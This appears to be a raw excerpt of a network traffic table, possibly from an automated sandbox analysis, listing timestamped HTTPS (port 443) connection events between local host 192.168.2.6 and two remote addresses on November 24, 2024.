                                                                                                                                                                                              Nov 24, 2024 13:40:57.836389065 CET4435001813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.837084055 CET50018443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.837136030 CET4435001813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.837723017 CET50018443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.837735891 CET4435001813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.889509916 CET4435001613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.893090010 CET4435001613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.893168926 CET50016443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.893223047 CET50016443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.893260002 CET4435001613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.893285036 CET50016443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.893302917 CET4435001613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.896589994 CET50021443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.896703959 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.896806002 CET50021443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.896954060 CET50021443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.896987915 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.945305109 CET4435002013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.945882082 CET50020443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.945914030 CET4435002013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:57.946482897 CET50020443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:57.946489096 CET4435002013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.016263008 CET4435001713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.019340038 CET4435001713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.019408941 CET50017443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.019469023 CET50017443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.019469023 CET50017443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.019493103 CET4435001713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.019505024 CET4435001713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.021874905 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.021905899 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.021975994 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.022109032 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.022121906 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.220865965 CET4435001913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.223848104 CET4435001913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.223918915 CET50019443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.223958969 CET50019443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.223984003 CET4435001913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.223998070 CET50019443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.224004984 CET4435001913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.227521896 CET50023443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.227582932 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.227664948 CET50023443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.227845907 CET50023443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.227863073 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.282727003 CET4435001813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.285836935 CET4435001813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.285907030 CET50018443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.285957098 CET50018443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.285983086 CET4435001813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.285994053 CET50018443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.286000013 CET4435001813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.288522005 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.288568020 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.288640022 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.288758039 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.288774967 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.422806025 CET4435002013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.422832012 CET4435002013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.422877073 CET4435002013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.422898054 CET50020443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.422924042 CET50020443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.423113108 CET50020443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.423139095 CET4435002013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.423155069 CET50020443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.423160076 CET4435002013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.426055908 CET50025443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.426114082 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.426189899 CET50025443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.426333904 CET50025443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:58.426347017 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.644277096 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:58.644345045 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:58.644440889 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:58.645057917 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:40:58.645081043 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:59.687824965 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:59.688378096 CET50021443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:59.688432932 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:59.688849926 CET50021443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:59.688882113 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:59.940387964 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:59.940960884 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:59.940992117 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:59.941471100 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:59.941482067 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.132644892 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.137204885 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.137290955 CET50021443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.137355089 CET50021443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.137382030 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.137397051 CET50021443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.137406111 CET4435002113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.140101910 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.140150070 CET4435002713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.140224934 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.140350103 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.140361071 CET4435002713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.150744915 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.151124954 CET50025443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.151135921 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.151575089 CET50025443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.151581049 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.171233892 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.171647072 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.171670914 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.172038078 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.172043085 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.198513985 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.198961973 CET50023443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.198986053 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.199368954 CET50023443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.199383974 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.416645050 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.416676044 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.416726112 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.416732073 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.416774035 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.416982889 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.417002916 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.417016029 CET50022443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.417021990 CET4435002213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.419683933 CET50028443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.419719934 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.419786930 CET50028443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.420041084 CET50028443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.420056105 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.585428953 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.588857889 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.588979959 CET50025443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.589032888 CET50025443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.589061975 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.589073896 CET50025443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.589078903 CET4435002513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.592438936 CET50029443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.592478037 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.592730045 CET50029443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.592730045 CET50029443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.592761993 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615072966 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615420103 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615458965 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615480900 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615518093 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615560055 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615575075 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615585089 CET50024443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.615590096 CET4435002413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.617847919 CET50030443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.617868900 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.617935896 CET50030443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.618037939 CET50030443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.618050098 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.654298067 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.657201052 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.657280922 CET50023443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.657341957 CET50023443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.657341957 CET50023443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.657377005 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.657398939 CET4435002313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.659636021 CET50031443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.659657955 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.659722090 CET50031443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.659857988 CET50031443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:00.659869909 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.870968103 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.871109009 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:41:00.873032093 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:41:00.873043060 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.873275042 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.875230074 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:41:00.875298023 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:41:00.875303030 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:00.875713110 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:41:00.919378042 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:01.542948961 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:01.543168068 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:01.543234110 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:41:01.543369055 CET50026443192.168.2.620.198.119.143
                                                                                                                                                                                              Nov 24, 2024 13:41:01.543389082 CET4435002620.198.119.143192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.104017019 CET4435002713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.104758024 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.104789019 CET4435002713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.105300903 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.105310917 CET4435002713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.355139017 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.355768919 CET50028443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.355782032 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.356163025 CET50028443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.356167078 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.510344028 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.510871887 CET50029443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.510915041 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.511581898 CET50029443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.511595011 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.543107033 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.543714046 CET50030443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.543725014 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.544106960 CET50030443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.544111967 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.552829981 CET4435002713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.555944920 CET4435002713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.556122065 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.556122065 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.556122065 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.558965921 CET50032443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.558995962 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.559071064 CET50032443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.559187889 CET50032443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.559196949 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.582761049 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.583475113 CET50031443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.583507061 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.583848953 CET50031443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.583857059 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.869350910 CET50027443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.869385958 CET4435002713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.891443968 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.891541004 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.891628027 CET50028443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.891875029 CET50028443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.891891956 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.891902924 CET50028443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.891907930 CET4435002813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.894575119 CET50033443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.894613028 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.894685030 CET50033443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.894817114 CET50033443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.894830942 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.992748022 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.992839098 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.992969990 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.993012905 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.993120909 CET50029443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.993161917 CET50029443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.993189096 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.993204117 CET50029443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.993211985 CET4435002913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.996190071 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.996355057 CET50030443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.998630047 CET50030443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.998641968 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:02.998650074 CET50030443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:02.998655081 CET4435003013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.000668049 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.000725031 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.000797033 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.000935078 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.000946999 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.002012014 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.002027988 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.002098083 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.002315998 CET50035443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.002327919 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.032749891 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.032809973 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.032915115 CET50031443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.052474976 CET50031443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.052514076 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.052531004 CET50031443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.052540064 CET4435003113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.055682898 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.055713892 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:03.055788040 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.055906057 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:03.055923939 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.374838114 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.375372887 CET50032443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.375425100 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.375890970 CET50032443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.375900030 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.638674021 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.639267921 CET50033443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.639285088 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.639789104 CET50033443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.639792919 CET4435003313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.811655045 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.812179089 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.812200069 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.812695026 CET50036443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.812701941 CET4435003613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.829780102 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.830140114 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.830171108 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.830559969 CET50034443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:41:04.830565929 CET4435003413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.831958055 CET4435003513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832048893 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832103968 CET4435003213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:41:04.832149982 CET50032443192.168.2.613.107.246.63
